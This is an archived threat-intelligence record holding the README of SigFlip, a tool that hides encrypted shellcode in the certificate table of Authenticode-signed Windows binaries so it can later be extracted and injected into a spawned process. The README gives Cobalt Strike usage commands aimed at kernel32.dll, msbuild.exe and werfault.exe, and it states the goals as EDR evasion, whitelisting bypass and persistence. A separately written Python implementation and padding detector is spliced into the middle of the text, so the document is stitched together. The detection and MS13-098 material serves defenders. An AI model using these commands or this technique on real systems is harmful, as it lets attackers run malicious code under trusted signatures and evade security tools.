{
	"id": "8a6c212b-1eb4-4d11-b1b6-0634e5dd1bd0",
	"created_at": "2026-04-06T00:09:42.006209Z",
	"updated_at": "2026-04-10T03:32:39.291632Z",
	"deleted_at": null,
	"sha1_hash": "a09723900d2b4ce8e9c0e5e99d14c15719c91a44",
	"title": "GitHub - med0x2e/SigFlip: SigFlip is a tool for patching authenticode signed PE files (exe, dll, sys ..etc) without invalidating or breaking the existing signature.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 85437,
	"plain_text": "GitHub - med0x2e/SigFlip: SigFlip is a tool for patching authenticode signed PE files (exe, dll, sys ..etc) without invalidating or breaking the existing signature.\r\nBy med0x2e\r\nArchived: 2026-04-05 20:21:07 UTC\r\nWhat is it ?\r\nSigFlip is a tool for patching Authenticode-signed PE files (exe, dll, sys, etc.) in a way that does not affect or break the existing Authenticode signature. In other words, you can change a PE file's checksum and hash by embedding data (e.g. shellcode) in it without breaking the file's signature, its integrity checks or its functionality.\r\nSigInject encrypts and injects shellcode into a PE file's [WIN_CERTIFICATE] certificate table and prints the encryption key for use with a basic BOF/C/C# loader (SigLoader). SigInject writes the result to a new PE file whose signature and certificate remain valid.\r\nSigLoader is a basic loader which takes the path of a PE file created by SigInject and the decryption key as parameters, then extracts and decrypts the embedded shellcode for use with a shellcode injection technique of your choice.\r\nSigFlip checks that the PE hash was actually changed, and also checks for (and exits gracefully on) endpoints that are hardened against this common misconfiguration. 
(See the \"Details\" section.)\r\nQuick Note: SigFlip, SigInject and SigLoader are available both as BOF scripts and as .NET assemblies; the only difference is that in the .NET build the SigInject functionality is implemented as part of SigFlip (the -i switch).\r\nWhy ?\r\nIt can be used mainly for persistence, lateral movement or code/command execution, and can help with:\r\n- Application whitelisting bypasses: changing a PE file's hash (msbuild.exe, for example) without breaking its signature.\r\n- Bypassing EDRs that rely on the hashes of specific LOLBINs to detect malicious code/command execution.\r\n- Loading signed drivers under a different hash, which may circumvent EDRs that watch for commonly abused vulnerable signed drivers using a pre-defined list of hashes.\r\n- Embedding encrypted shellcode in a signed PE file and using a stager of your preference (SigLoader) to parse, decrypt, load and execute it.\r\n- Endpoint security vendors tend to classify signed PE files as benign most of the time, so embedding your unsigned code (shellcode, etc.) 
in a signed PE file makes it a little harder to detect or flag.\r\n- Bypassing endpoint security products that rely mainly on the default WinVerifyTrust behaviour for signature validation.\r\nhttps://github.com/med0x2e/SigFlip\r\nPage 1 of 6\n\n- Improving OPSEC and challenging defenders who rely solely on typical signature verification utilities such as signtool, sigcheck or Get-AuthenticodeSignature to validate the Authenticode signature of PE files.\r\nUsage \u0026 Examples:\r\nCompile/Build:\r\nPrecompiled BOFs are not provided in this project. Compile them with Mingw-w64; for .NET, use Visual Studio or csc.exe to compile the .NET projects (SigFlip, SigLoader). For the BOFs, follow the steps below:\r\n➜ i686-w64-mingw32-gcc -c sigflip.c -o sigflip.x86.o\r\n➜ x86_64-w64-mingw32-gcc -c sigflip.c -o sigflip.x64.o\r\n➜ x86_64-w64-mingw32-gcc -c SigLoader/sigloader.c -o sigloader.x64.o\r\n➜ i686-w64-mingw32-gcc -c SigLoader/sigloader.c -o sigloader.x86.o\r\nMake sure all object files are located in the same directory as sigflip.cna, then load the sigflip.cna script into Cobalt Strike.\r\nQuick Note: the BOFs were tested with, and are compatible with, mingw-w64 v8.0.0_3; mingw-w64 \u003e= v9 might work but might also crash active beacons (see issue #2 for details).\r\nCobalt Strike:\r\n1. Execute-Assembly\r\nexecute-assembly SigFlip.exe -h\r\nexecute-assembly SigLoader -h\r\n2. 
BOF\r\nFor use with Cobalt Strike, once you load the SigFlip.cna script two new commands are registered, SigFlip and SigInject; use them as below.\r\nSigFlip: change the hash of a PE file (DLL, EXE, SYS, OCX, etc.) without breaking the signature or the validity of the certificate:\r\nSigFlip \"\u003cPE_FILE_PATH\u003e\" \"\u003cOUTPUT_PE_FILE_PATH (with extension)\u003e\"\r\nSigInject: encrypts and injects shellcode into a PE file's [WIN_CERTIFICATE] certificate table, prints the encryption key for use with a basic C/C# loader, and keeps the signature and certificate validity intact:\r\nSigInject \"\u003cPE_FILE_PATH\u003e\" \"\u003cOUTPUT_PE_FILE_PATH (with extension)\u003e\" \"\u003cSHELLCODE_FILE\u003e\"\r\nSigLoader: loads the encrypted shellcode from a PE file created by SigInject, then uses Early Bird QueueUserAPC injection to spawn a sacrificial process and inject the shellcode into it. The injection logic can be customized or replaced with any other code injection technique of choice:\r\nSigLoader \u003cPE_FILE_PATH_WITH_SH\u003e \u003cDECRYPTION_KEY\u003e \u003cSPAWNTO_PROCESS_PATH\u003e \u003cPARENT_PROCESS_ID\u003e\r\n3. 
Examples\r\nBOF:\r\nInject random data into msbuild.exe (i.e. bit-flip msbuild.exe):\r\nSigFlip \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe\" \"C:\\lolbins\\modified-msbuild.exe\"\r\nInject shellcode into kernel32.dll (the argument order is different, and make sure to take note of the decryption key):\r\nSigInject \"C:\\Windows\\System32\\kernel32.dll\" \"C:\\random\\modified-kernel32.dll\" \"C:\\shellcode\\cobaltstrike_or_msf_shellcode.bin\"\r\nSigLoader \"C:\\random\\modified-kernel32.dll\" \"DECRYPTION_KEY\" \"C:\\Windows\\System32\\werfault.exe\" 6300\r\nExecute-Assembly:\r\nInject random data into msbuild.exe:\r\nexecute-assembly SigFlip.exe -b C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe -o C:\\Temp\\MSBuild.exe\r\nInject shellcode into kernel32.dll (the argument order is different, and make sure to take note of the decryption key):\r\nexecute-assembly SigFlip.exe -i C:\\Windows\\System32\\kernel32.dll -s C:\\Temp\\x86shellcode.bin -o C:\\Temp\\modified-kernel32.dll -e TestSecretKey\r\nexecute-assembly SigLoader.exe -f C:\\Temp\\modified-kernel32.dll -e TestSecretKey -pid 2354\r\nDetails:\r\nThis is a known technique, used by APT10 in multiple campaigns and intrusion sets (see the JPCERT JSAC 2021 paper listed in the references).\r\nAuthenticode Digital Signatures ?\r\nAuthenticode is a Microsoft code-signing technology that identifies the publisher of Authenticode-signed software. Authenticode also verifies that the software has not been tampered with since it was signed and published.\r\nHow does it work ?\r\nMicrosoft relies mainly on the Authenticode signing format for verifying the integrity and the origin of PE binaries. According to the Authenticode Portable Executable format specification, Authenticode signatures can be “embedded” in a Windows PE file, in a location specified by the Certificate Table entry in the Optional Header Data Directories. 
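The sentences that follow quote the Authenticode specification on which PE fields are excluded from the signed hash, and the numbered list under Details describes how SigFlip pads the certificate table. The Python below is an added example written for this page, not code from the SigFlip project: it builds a constructed, header-only PE32+ image carrying a fake WIN_CERTIFICATE (no real signature, so nothing here is verifiable by WinVerifyTrust), pads that table and fixes dwLength, the directory Size and the PE checksum as steps 7-10 describe, computes the Authenticode hash over the spec's layout so you can see it does not move while the whole-file hash does, and ends with the defender-side check that MS13-098's EnableCertPaddingCheck performs (bytes after the DER-encoded SignedData beyond alignment padding). The IMAGE_DIRECTORY_ENTRY_SECURITY and WIN_CERT_* values and the structure offsets come from the PE specification; FAKE_SIGNED_DATA, the function names and the 20-byte 0xCC payload are this example's own assumptions.

```python
"""Added example, not SigFlip's code: build a header-only PE32+ image with a constructed WIN_CERTIFICATE,
pad its certificate table as steps 3-11 under Details describe, and run the check EnableCertPaddingCheck enforces."""
import hashlib
import struct

IMAGE_DIRECTORY_ENTRY_SECURITY, WIN_CERT_REVISION_2_0, WIN_CERT_TYPE_PKCS_SIGNED_DATA = 4, 0x0200, 0x0002
# Constructed stand-in for a PKCS#7 SignedData blob: DER SEQUENCE { signedData OID, OCTET STRING }.
FAKE_SIGNED_DATA = b"\x30\x15" + b"\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x07\x02" + b"\x04\x08deadbeef"


def _nt_offsets(pe):
    """File offsets of (e_lfanew, OptionalHeader, CheckSum field, security data directory entry)."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    opt = e_lfanew + 4 + 20                                    # past the 20-byte IMAGE_FILE_HEADER
    dirs = opt + (112 if struct.unpack_from("<H", pe, opt)[0] == 0x20B else 96)   # PE32+ vs PE32
    return e_lfanew, opt, opt + 64, dirs + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY

def pe_checksum(pe):
    """OptionalHeader.CheckSum as imagehlp computes it; the CheckSum field itself counts as zero."""
    data = bytearray(pe) + b"\0" * (-len(pe) % 4)
    struct.pack_into("<I", data, _nt_offsets(pe)[2], 0)
    total = 0
    for (dword,) in struct.iter_unpack("<I", bytes(data)):
        total += dword
        total = (total & 0xFFFFFFFF) + (total >> 32)           # fold the carry back in
    total = (total & 0xFFFF) + (total >> 16)
    return ((total + (total >> 16)) & 0xFFFF) + len(pe)

def build_signed_pe(signed_data):
    """Constructed sample: MZ stub, PE32+ headers, no sections, one WIN_CERTIFICATE after the headers."""
    dos = bytearray(b"MZ").ljust(0x80, b"\0")
    struct.pack_into("<I", dos, 0x3C, 0x80)                                   # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, 240, 0x0022)       # AMD64, SizeOfOptionalHeader 240
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                                     # PE32+ magic
    size_of_headers = 0x80 + 4 + len(file_hdr) + len(opt)
    struct.pack_into("<I", opt, 60, size_of_headers)                          # SizeOfHeaders
    struct.pack_into("<I", opt, 108, 16)                                      # NumberOfRvaAndSizes
    blob = signed_data + b"\0" * (-len(signed_data) % 8)                      # quadword-aligned entry
    win_cert = struct.pack("<IHH", 8 + len(blob), WIN_CERT_REVISION_2_0, WIN_CERT_TYPE_PKCS_SIGNED_DATA) + blob
    # Security directory entry: the "RVA" is a file offset, here pointing just past the headers.
    struct.pack_into("<II", opt, 112 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY, size_of_headers, len(win_cert))
    pe = bytearray(dos + b"PE\0\0" + file_hdr + opt + win_cert)
    struct.pack_into("<I", pe, _nt_offsets(pe)[2], pe_checksum(pe))
    return bytes(pe)

def authenticode_hash(pe, algo="sha256"):
    """Hash over what Authenticode signs: everything except CheckSum, the security directory entry and the certificate table."""
    e_lfanew, opt, ck_off, sec = _nt_offsets(pe)
    _, n_sections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", pe, e_lfanew + 4)
    size_of_headers, cert_size = struct.unpack_from("<I", pe, opt + 60)[0], struct.unpack_from("<I", pe, sec + 4)[0]
    h = hashlib.new(algo)
    h.update(pe[:ck_off] + pe[ck_off + 4:sec] + pe[sec + 8:size_of_headers])  # headers minus the two excluded fields
    hashed = size_of_headers
    sections = [struct.unpack_from("<II", pe, opt + opt_size + 40 * i + 16) for i in range(n_sections)]
    for raw_size, raw_ptr in sorted(sections, key=lambda s: s[1]):           # (SizeOfRawData, PointerToRawData)
        h.update(pe[raw_ptr:raw_ptr + raw_size])
        hashed += raw_size
    tail = len(pe) - hashed - cert_size                                      # overlay minus the certificate table
    if tail > 0:
        h.update(pe[hashed:hashed + tail])
    return h.hexdigest()

def pad_certificate_table(pe, payload):
    """Steps 3-11: append payload inside the WIN_CERTIFICATE entry, then fix dwLength, directory Size and CheckSum."""
    pe = bytearray(pe)
    _, _, ck_off, sec = _nt_offsets(pe)
    rva, size = struct.unpack_from("<II", pe, sec)
    if size == 0 or rva + size != len(pe) or struct.unpack_from("<I", pe, rva)[0] != size:
        raise ValueError("expected exactly one WIN_CERTIFICATE entry at the end of the file")
    extra = payload + b"\0" * (-len(payload) % 8)                 # keep the entry quadword-aligned
    pe += extra
    struct.pack_into("<I", pe, rva, size + len(extra))            # step 9: WIN_CERTIFICATE.dwLength
    struct.pack_into("<I", pe, sec + 4, size + len(extra))        # step 8: IMAGE_DIRECTORY_ENTRY_SECURITY.Size
    struct.pack_into("<I", pe, ck_off, pe_checksum(pe))           # step 10: OptionalHeader.CheckSum
    return bytes(pe)

def inspect_certificate_table(pe):
    """Defender-side equivalent of EnableCertPaddingCheck: data after the DER SignedData beyond 7 zero alignment bytes."""
    rva = struct.unpack_from("<I", pe, _nt_offsets(pe)[3])[0]
    dw_length = struct.unpack_from("<I", pe, rva)[0]
    der = pe[rva + 8:rva + dw_length]                              # bCertificate
    if der[:1] != b"\x30":
        raise ValueError("bCertificate is not a DER SEQUENCE")
    if der[1] < 0x80:                                              # DER length: short form ...
        hdr, length = 2, der[1]
    else:                                                          # ... or long form 0x8N + N length bytes
        hdr = 2 + (der[1] & 0x7F)
        length = int.from_bytes(der[2:hdr], "big")
    slack = der[hdr + length:]
    return {"dwLength": dw_length, "der_length": hdr + length, "slack": len(slack),
            "padded": len(slack) > 7 or any(slack)}

if __name__ == "__main__":
    clean = build_signed_pe(FAKE_SIGNED_DATA)
    flipped = pad_certificate_table(clean, b"\xcc" * 20)           # stand-in for shellcode
    print(inspect_certificate_table(flipped), authenticode_hash(clean) == authenticode_hash(flipped))
```

Run it directly with only the standard library. On a real signed binary, feed the file's bytes instead of build_signed_pe(...): pad_certificate_table refuses files whose certificate table is not the last thing in the file or that carry more than one entry, and inspect_certificate_table is the check a detection pipeline would run over signed files to flag the padding this README describes, independently of whether the host has EnableCertPaddingCheck set.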
When Authenticode is used to sign a Windows PE file, the algorithm that calculates the file’s Authenticode hash value excludes certain PE fields. When embedding the signature in the file, the signing process can modify these fields without affecting the file’s hash value. These fields are: the checksum, the certificate table RVA, the certificate table size and the attribute certificate table itself. The attribute certificate table contains a PKCS #7 SignedData structure containing the PE file’s hash value, a signature created by the software publisher’s private key, and the X.509 v3 certificates that bind the software publisher’s signing key to a legal entity.\r\nIn layman's terms, we can modify or embed data into the fields excluded from the Authenticode hash calculation without breaking the Authenticode signature or the file integrity checks.\r\nMore details about these excluded fields:\r\nCertificate table RVA and Size: a signed PE file's optional header contains an array of data directories, including the security directory (the IMAGE_DIRECTORY_ENTRY_SECURITY entry), which has two fields, RVA and Size.\r\nRVA: a file offset (not a memory offset) to the attribute certificate table.\r\nSize: the size of the attribute certificate table.\r\nAttribute Certificate Table: a WIN_CERTIFICATE data structure which encapsulates the signature and certificates and has the following fields:\r\ndwLength : the length of the certificate entry, including this 8-byte header (for a single-entry table this equals the data directory Size).\r\nwRevision : the “revision” of the WIN_CERTIFICATE (WIN_CERT_REVISION_2_0 for Authenticode).\r\nwCertificateType : the kind of encapsulated certificate data (WIN_CERT_TYPE_PKCS_SIGNED_DATA for Authenticode).\r\nbCertificate : the actual certificate data. For WIN_CERT_TYPE_PKCS_SIGNED_DATA this is the PKCS#7 SignedData structure mentioned above (which contains the PE hash value, the signature and the X.509 certificates); this is exactly where SigFlip embeds its random data or shellcode, appended after the DER-encoded SignedData and covered by the enlarged dwLength.\r\nWith all of that in mind, SigFlip does the following:\r\n1. Check system configuration\r\n2. 
Load the PE file, verify its signature and compute its SHA1 hash\r\n3. Get the \"e_lfanew\" offset (pointing to the PE file header, IMAGE_NT_HEADERS)\r\n4. Get IMAGE_OPTIONAL_HEADER from IMAGE_NT_HEADERS\r\n5. Get the IMAGE_DATA_DIRECTORY array from IMAGE_OPTIONAL_HEADER\r\n6. Get the IMAGE_DIRECTORY_ENTRY_SECURITY entry and retrieve the RVA and Size of the Attribute Certificate Table (WIN_CERTIFICATE)\r\n7. Patch the PE file blob by padding the Certificate Table with extra bytes (random data or shellcode) of choice\r\n8. Update the IMAGE_DIRECTORY_ENTRY_SECURITY data directory Size in the optional header\r\n9. Update the WIN_CERTIFICATE (Certificate Table) dwLength\r\n10. Generate the new PE checksum and update it (optional header CheckSum)\r\n11. Save the final PE with its new size\r\n12. Verify the modified PE file's signature\r\nThe first step is essential to confirm that the system is misconfigured in a way that allows padding and injecting shellcode into Authenticode-signed PE files, therefore the following sanity checks are performed:\r\n1. Check that the MS13-098 fix (KB2893294) is not installed. Keep in mind that IT COULD BE INSTALLED BUT THE REGISTRY KEYS NOT PROPERLY SET, WHICH RENDERS THE PATCH USELESS: the stricter check is opt-in and only takes effect once the EnableCertPaddingCheck value is present.\r\n2. Check the registry keys:\r\n1. X86:\r\nCheck whether the registry key \"HKLM:\\Software\\Microsoft\\Cryptography\\Wintrust\\Config\" is absent\r\n-\u003e if it exists, check whether the \"EnableCertPaddingCheck\" registry value is absent\r\n2. 
X64:\r\nCheck whether the registry key \"HKLM:\\Software\\Wow6432Node\\Microsoft\\Cryptography\\Wintrust\\Config\" is absent\r\n-\u003e if it exists, check whether the \"EnableCertPaddingCheck\" registry value is absent.\r\nMicrosoft's advisory sets EnableCertPaddingCheck to the string value \"1\" and, on 64-bit Windows, under both of the keys above, since the Wow6432Node key is the one 32-bit processes read; a host with only one of them set is still exploitable from the other bitness.\r\nWhy can't the injected data be read when the modified PE is loaded as a module into its own address space or into the address space of another process?\r\nThe Windows loader does not map certificate data into the process address space, which is why you need a custom loader (such as SigLoader) to extract data such as shellcode from the file on disk and use it. This also explains why the IMAGE_DIRECTORY_ENTRY_SECURITY data directory entry's RVA is a file offset rather than a typical memory offset.\r\nDetect/Prevent:\r\nhttps://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2014/2915720?redirectedfrom=MSDN\r\nOnce the patch is installed and the proper registry keys are set, no system restart is required; you only need to restart the Cryptographic Services service. The AppLocker service will also be restarted, as it depends on the Cryptographic Services (@p0w3rsh3ll).\r\nYara rule by Adrien: https://twitter.com/Int2e_/status/1330975808941330432\r\nReferences\r\nhttps://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2013/ms13-098?redirectedfrom=MSDN\r\nhttps://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2014/2915720?redirectedfrom=MSDN\r\nhttp://download.microsoft.com/download/9/c/5/9c5b2167-8017-4bae-9fde-d599bac8184a/authenticode_pe.docx\r\nhttps://msrc-blog.microsoft.com/2013/12/10/ms13-098-update-to-enhance-the-security-of-authenticode/\r\nhttps://www.specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf\r\nhttps://p0w3rsh3ll.wordpress.com/2014/05/24/testing-ms13-098-certificate-padding-check/\r\nhttp://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf\r\nSource: 
https://github.com/med0x2e/SigFlip",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://github.com/med0x2e/SigFlip"
	],
	"report_names": [
		"SigFlip"
	],
	"threat_actors": [
		{
			"id": "04b07437-41bb-4126-bcbb-def16f19d7c6",
			"created_at": "2022-10-25T16:07:24.232628Z",
			"updated_at": "2026-04-10T02:00:04.906097Z",
			"deleted_at": null,
			"main_name": "Stone Panda",
			"aliases": [
				"APT 10",
				"ATK 41",
				"Bronze Riverside",
				"CTG-5938",
				"CVNX",
				"Cuckoo Spear",
				"Earth Kasha",
				"G0045",
				"G0093",
				"Granite Taurus",
				"Happyyongzi",
				"Hogfish",
				"ITG01",
				"Operation A41APT",
				"Operation Cache Panda",
				"Operation ChessMaster",
				"Operation Cloud Hopper",
				"Operation Cuckoo Spear",
				"Operation New Battle",
				"Operation Soft Cell",
				"Operation TradeSecret",
				"Potassium",
				"Purple Typhoon",
				"Red Apollo",
				"Stone Panda",
				"TA429",
				"menuPass",
				"menuPass Team"
			],
			"source_name": "ETDA:Stone Panda",
			"tools": [
				"Agent.dhwf",
				"Agentemis",
				"Anel",
				"AngryRebel",
				"BKDR_EVILOGE",
				"BKDR_HGDER",
				"BKDR_NVICM",
				"BUGJUICE",
				"CHINACHOPPER",
				"ChChes",
				"China Chopper",
				"Chymine",
				"CinaRAT",
				"Cobalt Strike",
				"CobaltStrike",
				"DARKTOWN",
				"DESLoader",
				"DILLJUICE",
				"DILLWEED",
				"Darkmoon",
				"DelfsCake",
				"Derusbi",
				"Destroy RAT",
				"DestroyRAT",
				"Ecipekac",
				"Emdivi",
				"EvilGrab",
				"EvilGrab RAT",
				"FYAnti",
				"Farfli",
				"Gen:Trojan.Heur.PT",
				"Gh0st RAT",
				"Ghost RAT",
				"GreetCake",
				"HAYMAKER",
				"HEAVYHAND",
				"HEAVYPOT",
				"HTran",
				"HUC Packet Transmit Tool",
				"Ham Backdoor",
				"HiddenFace",
				"Impacket",
				"Invoke the Hash",
				"KABOB",
				"Kaba",
				"Korplug",
				"LODEINFO",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"MiS-Type",
				"Mimikatz",
				"Moudour",
				"Mydoor",
				"NBTscan",
				"NOOPDOOR",
				"Newsripper",
				"P8RAT",
				"PCRat",
				"PlugX",
				"Poison Ivy",
				"Poldat",
				"PowerSploit",
				"PowerView",
				"PsExec",
				"PsList",
				"Quarks PwDump",
				"Quasar RAT",
				"QuasarRAT",
				"RedDelta",
				"RedLeaves",
				"Rubeus",
				"SNUGRIDE",
				"SPIVY",
				"SharpSploit",
				"SigLoader",
				"SinoChopper",
				"SodaMaster",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Trochilus RAT",
				"UpperCut",
				"Vidgrab",
				"WinRAR",
				"WmiExec",
				"Wmonder",
				"Xamtrav",
				"Yggdrasil",
				"Zlib",
				"certutil",
				"certutil.exe",
				"cobeacon",
				"dfls",
				"lena",
				"nbtscan",
				"pivy",
				"poisonivy",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434182,
	"ts_updated_at": 1775791959,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a09723900d2b4ce8e9c0e5e99d14c15719c91a44.pdf",
		"text": "https://archive.orkl.eu/a09723900d2b4ce8e9c0e5e99d14c15719c91a44.txt",
		"img": "https://archive.orkl.eu/a09723900d2b4ce8e9c0e5e99d14c15719c91a44.jpg"
	}
}